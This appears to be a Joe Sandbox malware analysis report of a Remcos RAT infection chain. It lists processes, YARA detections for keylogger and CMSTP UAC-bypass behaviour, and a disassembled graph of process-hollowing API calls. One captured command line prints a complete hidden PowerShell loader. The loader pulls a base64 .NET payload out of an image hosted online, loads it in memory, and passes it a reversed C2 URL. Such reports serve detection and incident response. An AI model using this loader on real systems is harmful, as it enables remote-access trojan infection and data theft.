                                        Has exited:true

                                        Target ID:11
                                        Start time:11:34:36
                                        Start date:09/09/2024
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CHMR/05/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                                        Imagebase:0xba0000
                                        File size:427'008 bytes
                                        MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.394834348.0000000003EA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.394834348.0000000003EA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.394834348.0000000003EA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000B.00000002.394834348.0000000003EA9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        Reputation:high
                                        Has exited:true

                                        Target ID:12
                                        Start time:11:34:42
                                        Start date:09/09/2024
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                        Imagebase:0x910000
                                        File size:64'704 bytes
                                        MD5 hash:8FE9545E9F72E460723F484C304314AD
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.911284833.00000000006D5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.911284833.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:false

                                        Target ID:13
                                        Start time:11:34:45
                                        Start date:09/09/2024
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ibmyilijkzqgggcoxzdgfu"
                                        Imagebase:0x910000
                                        File size:64'704 bytes
                                        MD5 hash:8FE9545E9F72E460723F484C304314AD
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:14
                                        Start time:11:34:45
                                        Start date:09/09/2024
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\kvsjjdtlyhiliuyshkqzizcqbm"
                                        Imagebase:0x910000
                                        File size:64'704 bytes
                                        MD5 hash:8FE9545E9F72E460723F484C304314AD
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:15
                                        Start time:11:34:45
                                        Start date:09/09/2024
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\uxxbkweempbqtbmwyvcbtlxzcbqib"
                                        Imagebase:0x910000
                                        File size:64'704 bytes
                                        MD5 hash:8FE9545E9F72E460723F484C304314AD
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.397970865.00000000001AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001AD000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ad000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2a33d848474eba099247b6107057bde7999030feb5fd59034bc6305422b72632
                                          • Instruction ID: 620a1b81620de26ae6f9b0772d6937e631e7b85368d7a322f3eec13d15b8bace
                                          • Opcode Fuzzy Hash: 2a33d848474eba099247b6107057bde7999030feb5fd59034bc6305422b72632
                                          • Instruction Fuzzy Hash: 3F018C6100D3C09FD7128B259D94762BFA4EF53624F1985CBE8858F1A3C2685C45CB72
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.397970865.00000000001AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001AD000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ad000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c954b7f594843731643fad38a002b38c1352b82bc6af080216937760f30dd43b
                                          • Instruction ID: ba196816cb939a223c39cf0e9ef57baf0c7c35a12a65c02fb8e1990c67ce0a71
                                          • Opcode Fuzzy Hash: c954b7f594843731643fad38a002b38c1352b82bc6af080216937760f30dd43b
                                          • Instruction Fuzzy Hash: 0101F774104740EEE7248E25DD8476BBBD8EF427A4F28C515FC4A0F582C3799941CAB1

                                          Execution Graph

                                          Execution Coverage:11.4%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:58.7%
                                          Total number of Nodes:46
                                          Total number of Limit Nodes:2

                                          Control-flow Graph

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.393625374.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_210000_powershell.jbxd
                                          Similarity
                                          • API ID: ContextMemoryProcessThreadWow64Write
                                          • String ID:
                                          • API String ID: 3696009080-0
                                          • Opcode ID: 97f63a99c6953d4701f7079def81ad26ce0e2c881f4318d1f662496b069bc83e
                                          • Instruction ID: d71e57b065ba37e0a8fcfe190f4fc803b428cf971940f33419d4f601e7577ed2
                                          • Opcode Fuzzy Hash: 97f63a99c6953d4701f7079def81ad26ce0e2c881f4318d1f662496b069bc83e
                                          • Instruction Fuzzy Hash: E762DD74A11228CFEB65DF25C885BEDBBB2AF98300F5081EA950DA7291DB345EC5CF50

                                          Control-flow Graph

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.393625374.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_210000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 017e30c08340afe6085a6537a4c02a1179e47f2f2b391ab18650b6731ac47a27
                                          • Instruction ID: 799da4fb46a20f7090ccf2b8930e130bff39d4c98083db385741b6bc782d76d1
                                          • Opcode Fuzzy Hash: 017e30c08340afe6085a6537a4c02a1179e47f2f2b391ab18650b6731ac47a27
                                          • Instruction Fuzzy Hash: 1E32EE74A112288FEB64DF25C885BEDBBB2AF99300F5081EAD50DA7291DB345EC5CF40

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.393659857.00000000006C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6c0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: L4#p$L4#p$L4#p$d=H
                                          • API String ID: 0-1230055800
                                          • Opcode ID: e95a89bad26cac6bb6eac68fcd054356d138a463df7443fbe2045e31609d0fa0
                                          • Instruction ID: 11a0746980c3179ab3876cd67c6b2fe73191a243788d2dfd91296c763c244f50
                                          • Opcode Fuzzy Hash: e95a89bad26cac6bb6eac68fcd054356d138a463df7443fbe2045e31609d0fa0
                                          • Instruction Fuzzy Hash: B0B1F131B00246EBDB159F64C860BBE7BA2EF85311F18846EEE059B391DB75CD42C791

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.393659857.00000000006C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6c0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: l;H$l;H
                                          • API String ID: 0-4251726270
                                          • Opcode ID: 1ed4976eca4aeca47246e7d4cd9ac3e86be2e7607b04f0162848fece8257a159
                                          • Instruction ID: dd2fc28d723fac1a22bb6b808bf5b80601082ee8e15341ee9d79fc18ac69fe1a
                                          • Opcode Fuzzy Hash: 1ed4976eca4aeca47246e7d4cd9ac3e86be2e7607b04f0162848fece8257a159
                                          • Instruction Fuzzy Hash: 6A411375704302DBFB285BA48410BBAB393EF90311B24897ED81ADB391EB76DD42C761

                                          Control-flow Graph

                                          APIs
                                          • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00215B07
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.393625374.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_210000_powershell.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 92afc36bdb7ebae76cad0ab000938478d8c21aa1e602b14596e4ef37b02bd539
                                          • Instruction ID: 977fbb5daff8525793f8d8437b41dce86967db4bc43dc3ec277e26d5a51087e7
                                          • Opcode Fuzzy Hash: 92afc36bdb7ebae76cad0ab000938478d8c21aa1e602b14596e4ef37b02bd539
                                          • Instruction Fuzzy Hash: 0581CF74D0022DDFDB24CFA5C880BDDBBF1AB59304F1494AAE549B7210DB749A85CF94

                                          Control-flow Graph
                                          APIs
                                          • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00215B07
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.393625374.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_210000_powershell.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: e7eaa6524d2693b3fb0453a7d2f764ba97bae082927207d13ee8c4a3ad302e5e
                                          • Instruction ID: 396fd3d75ae1abcc486a2ff35c38d722375661c891c512a9ef6cee25da6047eb
                                          • Opcode Fuzzy Hash: e7eaa6524d2693b3fb0453a7d2f764ba97bae082927207d13ee8c4a3ad302e5e
                                          • Instruction Fuzzy Hash: D681CE74D0022DCFDB25CFA5C880BEDBBF1AB59304F1490AAE549B7210DB749A89CF94

                                          Control-flow Graph
                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0021605E
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.393625374.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_210000_powershell.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: e88be9e160ff72a7d858bb76aaba88c8aebdd383a53fbebebc91320d8417d3fd
                                          • Instruction ID: 2958f077d7f01b6e8d3623477269a5943937f08ea41d90768e26d01cabfc33db
                                          • Opcode Fuzzy Hash: e88be9e160ff72a7d858bb76aaba88c8aebdd383a53fbebebc91320d8417d3fd
                                          • Instruction Fuzzy Hash: C24199B5D102599FCF10CFA9D984ADEFBF1BB59310F24902AE818B7210C375AA95CF64

                                          Control-flow Graph
                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0021605E
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.393625374.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_210000_powershell.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: 608de63e775cccffcdf0b128611aee775c5f5a6f5dccf9d2d832a30fa94c9e09
                                          • Instruction ID: bc19be3dd154e8bf6ef480193ed431c015ac7ca7c651125f9b163486298eee66
                                          • Opcode Fuzzy Hash: 608de63e775cccffcdf0b128611aee775c5f5a6f5dccf9d2d832a30fa94c9e09
                                          • Instruction Fuzzy Hash: 614178B5D10258DFCB10CFA9D984ADEFBF1BB59310F24902AE818B7210D375AA55CB64

                                          Control-flow Graph
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 00215D0A
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.393625374.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_210000_powershell.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: a6f367236ea728c60f1eae796280da747103a458fdaa00643a0b3121dd22d17d
                                          • Instruction ID: 7f5c2de2bc9ca2435880ef332f27dff4249f6ccd79617b70fec95582f3f08fbd
                                          • Opcode Fuzzy Hash: a6f367236ea728c60f1eae796280da747103a458fdaa00643a0b3121dd22d17d
                                          • Instruction Fuzzy Hash: 1331CBB5D11258DFCB10CFA9E884ADEFBF0AB49314F24806AE414B7350C3786A85CF54

                                          Control-flow Graph
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 00215D0A
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.393625374.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_210000_powershell.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: 77fca1270aee52e78a6d6f0ba9daf92542fdafcef133881d4a5c282e8bbeff21
                                          • Instruction ID: 5e36f2d41bcea53c8ddbd99d2b5ef06d7da1cdb852abd6a23e25ebf4aa2144aa
                                          • Opcode Fuzzy Hash: 77fca1270aee52e78a6d6f0ba9daf92542fdafcef133881d4a5c282e8bbeff21
                                          • Instruction Fuzzy Hash: E0318BB5D11258DFCB10CFA9E984ADEFBF1AB49314F24906AE414B7310D378AA45CFA4

                                          Control-flow Graph
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 00215D0A
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.393625374.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_210000_powershell.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: dccdcabf8e0c80c0579797105574e0b3b3ebfa4137d471326695c0c81c5f74a3
                                          • Instruction ID: 3731ef61a4c0e87058585bf71c644bc23e08073ed2cd93877c95d3cb3036dd6b
                                          • Opcode Fuzzy Hash: dccdcabf8e0c80c0579797105574e0b3b3ebfa4137d471326695c0c81c5f74a3
                                          • Instruction Fuzzy Hash: 9331ABB5D11258DFCB10CFAAD984ADEFBF1AB49314F24806AE414B7310D378AA45CFA4

                                          Control-flow Graph
                                          APIs
                                          • ResumeThread.KERNELBASE(?), ref: 00216146
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.393625374.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_210000_powershell.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: f5547b8dcdd944046d771e7eb1bb8713a73413e0b8ce10a9e0ca439c5c7713ee
                                          • Instruction ID: 295d7287435a7651cd984624c0945b0a4f7545dbc1b608a6ad9de3a1e1034a9e
                                          • Opcode Fuzzy Hash: f5547b8dcdd944046d771e7eb1bb8713a73413e0b8ce10a9e0ca439c5c7713ee
                                          • Instruction Fuzzy Hash: 2621CAB5D142499FCB10CFA9D884ADEFBF0EB4A320F24906AE818B7311C374A945CF64

                                          Control-flow Graph
                                          APIs
                                          • ResumeThread.KERNELBASE(?), ref: 00216146
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.393625374.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_210000_powershell.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: f13c69301152adc399866d3d677256897d03f1048956b25a79b704e50e673906
                                          • Instruction ID: d48a739bf8121d9d4a1b90aefaf03879dc2a84662535383cfadc2a5b9ddfe35d
                                          • Opcode Fuzzy Hash: f13c69301152adc399866d3d677256897d03f1048956b25a79b704e50e673906
                                          • Instruction Fuzzy Hash: 982197B4D102199FCB10CFA9D888ADEFBF4EB59314F24902AE818B7310D375A945CFA4

                                          Control-flow Graph
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.393659857.00000000006C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6c0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4c638d75cdd4102e343f7d5f3534477f5c0535771162181abfe6fca62f970dac
                                          • Instruction ID: 3ecd558890c063ac4b065e920649b663ba4c21993c3ea408673a932a8bc8a40d
                                          • Opcode Fuzzy Hash: 4c638d75cdd4102e343f7d5f3534477f5c0535771162181abfe6fca62f970dac
                                          • Instruction Fuzzy Hash: B3410135709201DBDB294A248410BFAB7A3EF93321B6885AFD8558F392EB74CD42C771
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.393659857.00000000006C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6c0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e3577a03c36a6d9550cabf9421c2b7f4d77a024c632dc06a536939b55db2340d
                                          • Instruction ID: c3c135da4b5139f6cae0a89b6ee229b18058c7985109a853af2a672310cd352d
                                          • Opcode Fuzzy Hash: e3577a03c36a6d9550cabf9421c2b7f4d77a024c632dc06a536939b55db2340d
                                          • Instruction Fuzzy Hash: A2312832784301CFEB259A64C450BFAB7A3EF99311B2488AED446CB351DB75CC82C751
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.393606481.00000000001BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BD000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_1bd000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 96435111b0455f36bd73616994eb657c7a4e747a0ae8c2325e12a63a4998a292
                                          • Instruction ID: e88ca081da19da11e789cd7a45b1d506770135917eaf6f08b0f1a780d4fa2a8f
                                          • Opcode Fuzzy Hash: 96435111b0455f36bd73616994eb657c7a4e747a0ae8c2325e12a63a4998a292
                                          • Instruction Fuzzy Hash: DE0157610093C09FD7168A259884692BFA4EF53624F1985CBE8888F1A3D3695C44CB72
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.393606481.00000000001BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BD000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_1bd000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 004c7b4562f51ec967f6c1682be96614208191edabad2baeb9ae3c2e0d63d79a
                                          • Instruction ID: 1061c2e34fc4ef40444f03949e4bbf27682e7e73195227125f6c54c3063a60b2
                                          • Opcode Fuzzy Hash: 004c7b4562f51ec967f6c1682be96614208191edabad2baeb9ae3c2e0d63d79a
                                          • Instruction Fuzzy Hash: 5E01D430104340EAE7285E15D8847A6BB98DF41764F18C416FC480B182D3799941CAB1
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.393659857.00000000006C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6c0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1d8e339440ba200d9ed311311a43a33222c048263a62fe5d1be83762f818be14
                                          • Instruction ID: 84f3da561ad9e5f3106a05220be852b40e7ec01785b1f219f753952f80a3d76e
                                          • Opcode Fuzzy Hash: 1d8e339440ba200d9ed311311a43a33222c048263a62fe5d1be83762f818be14
                                          • Instruction Fuzzy Hash: 8EE0D831B44344CFDF29666090617FD7752EFA3251F1081EAD4509B757DA348C16C762
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.393659857.00000000006C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6c0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (:H$(:H$(:H$L4#p$L4#p$L4#p$L4#p$L4#p$L4#p$L:H$L:H$L:H
                                          • API String ID: 0-1930158942
                                          • Opcode ID: 4b6c8d88fbd973a9f96fb89ac3aa753bb0b2bd6c9b5b5d0e1cac1524ef12a264
                                          • Instruction ID: 6c4446d28a964da84a93889df2ac7312548aa54f163bb2e1d6da8d78b16d5525
                                          • Opcode Fuzzy Hash: 4b6c8d88fbd973a9f96fb89ac3aa753bb0b2bd6c9b5b5d0e1cac1524ef12a264
                                          • Instruction Fuzzy Hash: C0D1F331700244EBEB159FA8D850BBE7BA7EF84310F18C46AE9459B392DB74DE41C7A1

                                          Execution Graph

                                          Execution Coverage:6.3%
                                          Dynamic/Decrypted Code Coverage:15.6%
                                          Signature Coverage:3.2%
                                          Total number of Nodes:1922
                                          Total number of Limit Nodes:44
53645 420cf1 27 API calls 53504->53645 53507 404932 53505->53507 53508 404a36 53505->53508 53513 402093 28 API calls 53507->53513 53650 41cb72 30 API calls 53508->53650 53510 40490f 53615 402093 53510->53615 53512 40492b 53512->53507 53516 404941 53512->53516 53517 404a80 53513->53517 53515 404a40 53651 4052fd 28 API calls 53515->53651 53523 404950 53516->53523 53524 404987 53516->53524 53520 402093 28 API calls 53517->53520 53525 404a8f 53520->53525 53527 402093 28 API calls 53523->53527 53647 421ad1 54 API calls 53524->53647 53528 41b580 80 API calls 53525->53528 53531 40495f 53527->53531 53528->53502 53534 402093 28 API calls 53531->53534 53532 40498f 53535 4049c4 53532->53535 53536 404994 53532->53536 53540 40496e 53534->53540 53649 420e97 28 API calls 53535->53649 53538 402093 28 API calls 53536->53538 53542 4049a3 53538->53542 53543 41b580 80 API calls 53540->53543 53545 402093 28 API calls 53542->53545 53546 404973 53543->53546 53544 4049cc 53547 4049f9 CreateEventW CreateEventW 53544->53547 53549 402093 28 API calls 53544->53549 53548 4049b2 53545->53548 53646 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53546->53646 53547->53502 53550 41b580 80 API calls 53548->53550 53552 4049e2 53549->53552 53553 4049b7 53550->53553 53554 402093 28 API calls 53552->53554 53648 421143 52 API calls 53553->53648 53556 4049f1 53554->53556 53557 41b580 80 API calls 53556->53557 53558 4049f6 53557->53558 53558->53547 53560 41bdbc 53559->53560 53561 4020b7 28 API calls 53560->53561 53562 41734f 53561->53562 53563 402f31 53562->53563 53564 4020df 11 API calls 53563->53564 53565 402f3d 53564->53565 53566 4032a0 28 API calls 53565->53566 53567 402f59 53566->53567 53567->53471 53573 402eb0 53568->53573 53569 402ef2 53570 401fb0 28 API calls 53569->53570 53571 402ef0 53570->53571 53572 402055 11 API calls 53571->53572 53574 402f09 53572->53574 53573->53569 53575 402ee7 53573->53575 53574->53474 53710 403365 28 API calls 53575->53710 53577->53488 53579 
41b8d5 _swprintf __aulldiv 53578->53579 53579->53488 53711 436f10 53580->53711 53586 402252 11 API calls 53585->53586 53587 401f12 53586->53587 53587->53488 53589 404e40 SetEvent CloseHandle 53588->53589 53590 404e57 closesocket 53588->53590 53591 404ed8 53589->53591 53592 404e64 53590->53592 53591->53466 53593 404e7a 53592->53593 53766 4050e4 84 API calls 53592->53766 53594 404e8c WaitForSingleObject 53593->53594 53595 404ece SetEvent CloseHandle 53593->53595 53767 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53594->53767 53595->53591 53598 404e9b SetEvent WaitForSingleObject 53768 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53598->53768 53600 404eb3 SetEvent CloseHandle CloseHandle 53600->53595 53603 404846 socket 53602->53603 53604 404839 53602->53604 53605 404860 CreateEventW 53603->53605 53606 404842 53603->53606 53609 40489e WSAStartup 53604->53609 53605->53497 53606->53497 53608 40483e 53608->53603 53608->53606 53609->53608 53611 4020df 11 API calls 53610->53611 53612 40532a 53611->53612 53652 4032a0 53612->53652 53614 405346 53614->53510 53616 40209b 53615->53616 53617 4023ce 11 API calls 53616->53617 53618 4020a6 53617->53618 53656 4024ed 53618->53656 53621 41b580 53622 41b631 53621->53622 53623 41b596 GetLocalTime 53621->53623 53624 401fd8 11 API calls 53622->53624 53625 40531e 28 API calls 53623->53625 53626 41b639 53624->53626 53627 41b5d8 53625->53627 53629 401fd8 11 API calls 53626->53629 53660 406383 53627->53660 53631 41b641 53629->53631 53631->53504 53634 406383 28 API calls 53635 41b5fc 53634->53635 53670 40723b 77 API calls 53635->53670 53637 41b60a 53638 401fd8 11 API calls 53637->53638 53639 41b616 53638->53639 53640 401fd8 11 API calls 53639->53640 53641 41b61f 53640->53641 53642 401fd8 11 API calls 53641->53642 53643 41b628 53642->53643 53644 401fd8 11 API calls 53643->53644 53644->53622 53645->53512 53646->53502 53647->53532 53648->53546 53649->53544 53650->53515 53654 4032aa 53652->53654 
